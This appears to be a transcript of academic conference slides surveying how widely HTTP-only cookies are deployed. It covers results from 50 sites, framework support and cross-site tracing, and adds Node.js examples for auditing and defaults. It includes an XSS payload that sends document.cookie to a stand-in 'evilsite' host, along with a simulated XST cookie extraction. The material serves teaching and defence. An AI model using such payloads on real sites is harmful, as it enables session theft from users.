Why aren’t HTTP-only cookies more widely deployed?

Post on 22-Mar-2016


description

Why aren’t HTTP-only cookies more widely deployed? Yuchen Zhou and David Evans, Department of Computer Science, University of Virginia. HTTP-only cookies: the HTTP-only field prevents cookies from being read via document.cookie. Set-Cookie: Name = value; Domain = value; Expiration time = value; … (PowerPoint presentation)

transcript

Why aren’t HTTP-only cookies more widely deployed?

Yuchen Zhou, David Evans

Department of Computer Science, University of Virginia

HTTP-only Cookies

What injected script (XSS) can do: modify the DOM, disclose the user’s confidential information, install a trojan.

Cookie-theft flow shown on the slide: the evil JS injected into the page reads document.cookie and sends the user’s credentials back to the attacker, written on the slide in shorthand as

<img src = http://evilsite/stealyourcookie.cgi?value=document.cookie>

(the script appends the value of document.cookie to the image URL).

The HTTP-only field prevents cookies from being read via document.cookie.

Without the flag (the slide writes the attributes of the Set-Cookie header in simplified form):

Set-Cookie: Name = value; Domain = value; Expiration time = value; Path = value; Secure

With the flag:

Set-Cookie: Name = value; Domain = value; Expiration time = value; Path = value; Secure; HttpOnly

With HttpOnly set, the browser still sends the cookie on every request to the site, but injected script can no longer read it through document.cookie.

Lots of major sites still don’t use HTTP-only cookie

HTTP-only Deployment Timeline (2002 to 2010)

Server-side and client/other events shown on the slide:

• IE6 introduces HTTP-only
• Firefox extension supports HTTP-only
• Firefox 2.0.0.5 supports HTTP-only
• Django developers consider supporting HTTP-only, but compatibility concerns held them back
• Ruby on Rails supports HTTP-only
• Ruby on Rails sets HTTP-only on by default
• TRACE method is still on by default on Apache servers and major websites [10]
• w3.org specifies that browsers should disallow TRACE XMLHttpRequests
• IETF standard draft includes HTTP-only
• Still no official Django support for HTTP-only
• US-CERT vulnerability note on XST attacks
• Apache.org compromised by cookie-stealing XSS attacks
• Python supports HTTP-only; Django unofficial patch available
• IE8 fixes the XMLHttpRequest exploit
• TRACE method disabled by all major browsers
• Lots of major sites still don’t use HTTP-only cookies

Methodology

• 50 sites collected from Alexa.com world top 100 popular sites.
• Manually registered accounts and collected post-login cookie properties of all sites.
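The survey classifies a site by the attributes on the cookies it sets after login. The following Node.js script is an added example, not the authors’ survey tooling: it parses Set-Cookie headers, reports which cookies carry HttpOnly and Secure, and shows what an injected script would see through document.cookie. The sample headers, the `sessionid` cookie name and the `isAuthCookie` predicate are constructed for the example.

```javascript
'use strict';
// Added example: parse and audit Set-Cookie headers the way the survey
// classified sites (HTTP-only vs. not). Not part of the original slides.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are matched case-insensitively, as browsers do
// (HttpOnly, httponly and HTTPONLY are all the same flag).
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter((p) => p.length);
  const eq = parts[0].indexOf('=');
  if (eq < 1) throw new Error('Set-Cookie without name=value: ' + header);
  const cookie = {
    name: parts[0].slice(0, eq).trim(),
    value: parts[0].slice(eq + 1).trim(),
    attrs: Object.create(null),
  };
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i < 0 ? true : attr.slice(i + 1).trim();
  }
  return cookie;
}

// Audit a response's Set-Cookie headers. `isAuthCookie` is a caller-supplied
// predicate naming the session/authentication cookies (hypothetical; the
// survey identified them by hand).
function auditCookies(headers, isAuthCookie) {
  return headers.map(parseSetCookie).map((c) => ({
    name: c.name,
    auth: isAuthCookie(c.name),
    httpOnly: 'httponly' in c.attrs,
    secure: 'secure' in c.attrs,
  }));
}

// The survey's headline question: are all of the site's authentication
// cookies protected with HttpOnly?
function usesHttpOnlyAuth(headers, isAuthCookie) {
  const auth = auditCookies(headers, isAuthCookie).filter((r) => r.auth);
  return auth.length > 0 && auth.every((r) => r.httpOnly);
}

// What injected JavaScript sees through document.cookie: every cookie
// except those flagged HttpOnly (a simulation of the browser rule).
function scriptVisibleCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !('httponly' in c.attrs))
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample: Set-Cookie headers from a hypothetical post-login response.
const SAMPLE_HEADERS = [
  'sessionid=3f9a1c; Path=/; Expires=Wed, 21 Oct 2015 07:28:00 GMT; HttpOnly',
  'csrftoken=7d2e; Path=/; Secure',
  'prefs=theme%3Ddark; Path=/',
];

const DEMO_IS_AUTH = (name) => name === 'sessionid';
console.log(auditCookies(SAMPLE_HEADERS, DEMO_IS_AUTH));
console.log('HTTP-only auth cookies:', usesHttpOnlyAuth(SAMPLE_HEADERS, DEMO_IS_AUTH));
console.log('document.cookie would be:', scriptVisibleCookies(SAMPLE_HEADERS));
```

Run it against the Set-Cookie headers captured from a real login response (for example from the browser’s network panel) and the report gives the same yes/no answer the survey recorded per site, plus the Secure flag the later chart looks at.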

Survey Results

Httponly? (50 sites)

• No HTTP-only authentication cookies: 26
• Use HTTP-only authentication cookies: 24 (before login: 11; after login: 13)

Kapil Singh et al. (Oakland 2010) also gave similar results on the deployment of HTTP-only cookies:

HTTP-only: 30 of the top 100 sites; 16.2% of 100,000 sites.

Survey Results on Web Frameworks

(Framework names were lost in extraction for most rows; the ones given in parentheses are inferred from the version numbers, dates and the timeline above.)

Framework                Version   Date        HTTP-only Support   HTTP-only Default
(Django, inferred)       1.1.1     July 2009   No
Authkit                  0.4.4     July 2009   No
Repoze.who               1.0.10    2009        No
(Ruby on Rails, inferred) 2.3.2    Mar 2009    Yes                 Yes
(Ruby on Rails, inferred) 2.2.2    Nov 2008    Yes                 No
(Ruby on Rails, inferred) 2.1.2    Oct 2008    No
(name lost)              4.0       Feb 2010    Yes                 Yes
(name lost)              1.4       Feb 2010    Yes                 No
(name lost)              3.0       Feb 2010    No                  No

Why Aren’t HTTP-only Cookies More Widely Deployed?

Page Functionality: does the DOM need to read cookies?

– Only 1 site out of 50 showed a minor malfunction (in its web IM gadget) once the Httponly; flag was added to its cookies (renren.com).

Can We Circumvent HTTP-only?

• Cross-site tracing (XST)
• AJAX-based attack

Flow shown on the slide: the injected evil JS cannot read the HTTPONLY cookie through document.cookie, so it issues an XMLHttpRequest with the TRACE method instead. The browser attaches the Cookie header to that request as it does to any other, the server echoes the whole request back in the response body, and the script stores the echoed cookie (var cookie) and sends it back to the attacker.
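The following Node.js simulation is an added example, not code from the slides: it models the TRACE echo that makes cross-site tracing work, the attacker’s extraction of the echoed Cookie header, and the two fixes the timeline mentions (the browser refusing TRACE in XMLHttpRequest, and the server disabling TRACE). The host name, the `sessionid` cookie and the message framing are constructed for the example; no network is used.

```javascript
'use strict';
// Added example: cross-site tracing (XST) without a network, to show why
// TRACE defeats HttpOnly and where each fix lives. Not from the slides.

// Methods the XMLHttpRequest specification forbids a page from sending.
const FORBIDDEN_XHR_METHODS = ['CONNECT', 'TRACE', 'TRACK'];

// Client side: a browser that implements the spec refuses the request
// before it leaves the page; an old browser sends it with cookies attached
// (HttpOnly hides cookies from document.cookie, not from requests).
function browserSend(method, host, cookieHeader, browserBlocksTrace) {
  if (browserBlocksTrace && FORBIDDEN_XHR_METHODS.includes(method.toUpperCase())) {
    throw new Error(`SecurityError: method ${method} is forbidden for XMLHttpRequest`);
  }
  return [`${method} / HTTP/1.1`, `Host: ${host}`, `Cookie: ${cookieHeader}`, '', ''].join('\r\n');
}

// Server side: with TRACE enabled, RFC 2616 section 9.8 says the response
// body is the request message as received, Cookie header included.
function serverHandle(rawRequest, traceEnabled) {
  const method = rawRequest.slice(0, rawRequest.indexOf(' '));
  if (method !== 'TRACE') {
    return 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n';
  }
  if (!traceEnabled) {
    return 'HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\nContent-Length: 0\r\n\r\n';
  }
  return (
    'HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n' +
    `Content-Length: ${Buffer.byteLength(rawRequest)}\r\n\r\n` +
    rawRequest
  );
}

// Attacker side: the injected script reads the XHR response body and pulls
// the echoed Cookie header out of it.
function extractEchoedCookie(rawResponse) {
  const statusLine = rawResponse.slice(0, rawResponse.indexOf('\r\n'));
  if (!statusLine.startsWith('HTTP/1.1 200')) return null;
  const body = rawResponse.slice(rawResponse.indexOf('\r\n\r\n') + 4);
  const m = /^Cookie:[ \t]*(.*)$/m.exec(body);
  return m ? m[1].trim() : null;
}

// End to end: returns the cookie the attacker obtains, or null if either
// end's defense stopped the attack. The cookie value is a hypothetical session id.
function xstAttack({ browserBlocksTrace, traceEnabled }) {
  let request;
  try {
    request = browserSend('TRACE', 'victim.example', 'sessionid=abc123', browserBlocksTrace);
  } catch (e) {
    return null; // blocked on the client side
  }
  return extractEchoedCookie(serverHandle(request, traceEnabled));
}

// Only the combination of an old browser and TRACE left on leaks the cookie.
for (const scenario of [
  { browserBlocksTrace: false, traceEnabled: true },
  { browserBlocksTrace: false, traceEnabled: false },
  { browserBlocksTrace: true, traceEnabled: true },
]) {
  console.log(JSON.stringify(scenario), '->', xstAttack(scenario));
}
```

The server-side fix is a one-line change on Apache (`TraceEnable off`), but the simulation also shows the caveat that matters in practice: any endpoint that reflects request headers into a readable response body, a debugging page for instance, leaks HttpOnly cookies the same way, so HttpOnly is only as strong as the absence of such echoes.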

[Chart: TRACE status by HTTP-only use, values as read from the slide]
Sites that use HTTP-only (24): TRACE enabled 22, TRACE disabled 2
Sites that do not use HTTP-only (26): TRACE enabled 20, TRACE disabled 6

[Chart: Insecure/Secure by HTTP-only use, values as read from the slide]
Sites that use HTTP-only (24): Insecure 24, Secure 0
Sites that do not use HTTP-only (26): Insecure 21, Secure 5

Protection Effectiveness

Threats listed on the slide that HTTP-only does not address, because the cookie never passes through document.cookie in these cases: a key logger, a network packet sniffer, reading the cookie store from the hard drive, and CSRF (the browser still attaches the HTTP-only cookie to a forged request).

Software Stack Compatibility

• Python doesn’t support HTTP-only until 2.6.
• Django is based on Python, so the deployment progress is stalled.

Django developers: “Hmm, we probably can't use a patch that requires a patched python. Any different solution?”

Standards Compliance

• The cookie specification has never been updated since HTTP-only was introduced.
• Without the specs, the developers are hesitating to make the change.

Django developers: “Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it at all.”

[The HTTP-only Deployment Timeline slide is shown again here, unchanged.]

Difficulty in Deploying in Both Ends

• Similar deployment issues:
  – Set-Cookie2 header in RFC 2965
  – Updating the TCP protocol

• Server side: add the HTTP-only field to cookies; disable TRACE and implement Set-Cookie securely.
• Client side: interpret the HTTP-only field correctly; implement the HTTP-only defense correctly.

Lessons Learned

① Maintain backward compatibility.
② Be aggressive on the client side.
③ Opt-in? Opt-out! (Make Httponly the default a framework adds for you, rather than a flag each developer has to remember to set with Httponly = true.)
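As an added example of lesson 3 (not the slides’ code and not any framework’s API), here is a Set-Cookie builder in Node.js in which HttpOnly and Secure are on unless the caller explicitly turns them off. The cookie names and values are constructed for the demonstration.

```javascript
'use strict';
// Added example: opt-out rather than opt-in HttpOnly. Not from the slides.

// Cookie-name token and cookie-value octets as RFC 6265 defines them
// (no control characters, whitespace, double quote, comma, semicolon or backslash).
const COOKIE_NAME = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;
const COOKIE_VALUE = /^[\x21\x23-\x2B\x2D-\x3A\x3C-\x5B\x5D-\x7E]*$/;

// Build a Set-Cookie header value. A caller gets HttpOnly and Secure
// without asking; dropping either takes an explicit `httpOnly: false`
// or `secure: false`, which stands out in code review.
function serializeCookie(name, value, options = {}) {
  if (!COOKIE_NAME.test(name)) throw new Error(`invalid cookie name: ${name}`);
  if (!COOKIE_VALUE.test(value)) throw new Error('invalid cookie value');
  const opts = { httpOnly: true, secure: true, path: '/', domain: null, expires: null, ...options };
  const parts = [`${name}=${value}`];
  if (opts.domain) parts.push(`Domain=${opts.domain}`);
  if (opts.expires instanceof Date) parts.push(`Expires=${opts.expires.toUTCString()}`);
  if (opts.path) parts.push(`Path=${opts.path}`);
  if (opts.secure) parts.push('Secure');
  if (opts.httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// For the one case the survey found where a page needs script access
// (a web IM gadget): the exception is spelled out at the call site.
function serializeScriptReadableCookie(name, value, options = {}) {
  return serializeCookie(name, value, { ...options, httpOnly: false });
}

console.log(serializeCookie('sessionid', '3f9a1c'));
console.log(serializeScriptReadableCookie('im_state', 'online'));
```

The value check matters as much as the defaults: a semicolon in an unvalidated value would let an attacker-controlled value terminate the cookie and append its own attributes.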

Questions?

Thank you!

Backup Slides

• Survey Results: Kapil Singh et al. (Oakland 2010) also found similar results on the deployment of HTTP-only cookies.
• Survey Results on More Sites
• Page Functionality
• Google Analytics?